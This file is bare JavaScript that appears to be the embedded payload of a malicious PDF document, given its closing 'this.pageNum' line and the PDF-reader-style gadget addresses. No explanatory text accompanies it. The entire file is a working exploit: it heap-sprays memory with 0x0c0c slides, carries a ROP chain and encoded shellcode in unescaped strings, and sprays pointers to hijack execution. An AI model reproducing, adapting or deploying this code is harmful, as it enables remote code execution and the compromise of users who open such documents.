var padding
var bbb, ccc, ddd, eee, fff, ggg, hhh
var pointers_a, i
var x = new Array()
var y = new Array()
function alloc(bytes) {
  return padding.substr(0, (bytes - 6) / 2)
}
function spray_eip(esc_a) {
  pointers_a = unescape(esc_a)
  for (i = 0; i < 2000; i++) {
    x[i] = alloc(8) + pointers_a
    y[i] = alloc(136) + pointers_a
    y[i] = alloc(136) + pointers_a
    y[i] = alloc(136) + pointers_a
  }
}
function spray_shellcode() {
  bbb = unescape(
    '%uc474%u87e3%u0c0c%u0c0c%u0c0c%u0c0c%u6f29%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u6f29%u4a80%u6cef%u4a80%u5a64%u4235%u5a64%u4235%u5a64%u4235%u5a64%u4235%u0000%u0000%u0002%u0000%u0102%u0000%u6f29%u4a80%u2d0c%ue2d8%u2d0c%ue2d8%u2d0c%ue2d8%u2d0c%ue2d8%u2d0c%ue2d8%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%u63a5%u4a80%ud55f%u28da%ud55f%u28da%ud55f%u28da%ud55f%u28da%ud55f%u28da%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u0000%u0000%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc2d9%uadba%uc44e%ud999%u2474%u5ef4%uc92b%u6fb1%uee83%u31fc%u1356%ufb03%u265d%uff6c%u2f8a%uff8f%u504a%u1a19%u427b%u6f7d%u522e%u3df5%u19c3%ud55b%u6f50%uda74%udad1%ud5a2%ueae2%ub96a%u6c21%uc317%u4e75%u0c26%u8f88%u706f%udd63%uff38%uf2d6%ubd4d%uf3ea%uca81%u8c53%u0ca4%u2627%u5ca6%u3d98%u44e0%u1a92%u75d1%u7977%u3c2d%u4afc%ubfc5%u82d4%u8e26%u4818%u3f19%u9095%u875d%ue746%uf495%uf0fb%u876d%u7427%u2f70%u2ea3%uce50%ua860%udc13%ubecd%uc07c%u13d0%ufcf7%u9259%u75d8%ub119%udefc%ud8f9%ubaa5%ue5ac%u62b6%u4010%u80bc%uf245%ucc9f%u9ef7%u0c6b%u1660%u62fd%u5119%u2e1b%u2db1%ue893%u5146%uc58e%ufab7%u7266%u531f%u46e1%u22c9%u4956%u3f20%ueef8%u09fa%u41a8%u8a97%u301a%udd0d%ue2cf%u8ab9%u9d66%ucafc%u4aac%u6c4f%u5e7e%ue602%u6c80%u72c3%uc2d2%u2a51%ub281%u273d%u1c70%u4885%ue9ae%udc3f%ub241%ua1d7%u4451%u2b28%u2e75%u7b2c%ub11c%u137a%u8b95%u651c%uc6aa%u9510%ubf02%u3e05%u57fb%uc687%udc1b%u1328%ue29e%u80a2%uedea%uc0c8%uf1ec%ud9d0%u183c%u1d5b%udabf%ub2b4%u2540%ue4bb%uea88%ud57c%u7491%u2918%uefb1%ue9d3%ubf1a%ue879%u3dce%u862e%u2b0c%u01cc%u7179%u7726%u7a36%u1b12%u44f8%ua4fb%u47ff%u112d%ucaab%ubd61%ue55c%u09b9%u555f%u246b%u4708%u411d%u982a%ud7f4%u126b%u8fda%u1aee%u2650%u9a9b%u16cd%uded6%u9ac9%u8db8%u8e79%u9f6f%u2f21%u5c5a%ucb39%uac8e%ubc91%ua696%u6f91%u13e8%u8ff7%uf341%u1b39%u8402%ucec5%u8ab7%u0151%u28f2%u1ef7%uc428%u1f68%ueb2c%u95fb%u77bd%u64cd%u126c%ue255%u3470%u13ae%u3b8f%u9cc6%ued07%u0241%u9a8b%ub6f4%u3f65%u5b98%u417a'
  )
  ccc = unescape('%u0c0c')
  ccc += ccc
  while (ccc.length + 20 + 8 < 65536) {
    ccc += ccc
  }
  i1 = 3048
  ddd = ccc.substring(0, i1 / 2)
  ddd += bbb
  ddd += ccc
  i2 = 65536
  eee = ddd.substring(0, i2 / 2)
  for (; eee.length < 524288; ) {
    eee += eee
  }
  i3 = 2060
  fff = eee.substring(0, 524288 - i3)
  ggg = new Array()
  for (hhh = 0; hhh < 496; hhh++) {
    ggg[hhh] = fff + 's'
  }
}
padding = unescape(
  '%u5bd1%u671d%u5bd1%u671d%u5bd1%u671d%u53c3%u4a84%u2e4f%u4293%u2e4f%u4293%u2e4f%u4293%u2e4f%u4293%u2e4f%u4293%u2e4f%u4293%u2e4f%u4293%u0c0c%u0c0c%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b%ude97%ubb3b'
)
while (padding.length < 65536) {
  padding = padding + padding
}
spray_shellcode()
spray_eip('%u4141')
this.pageNum = 2
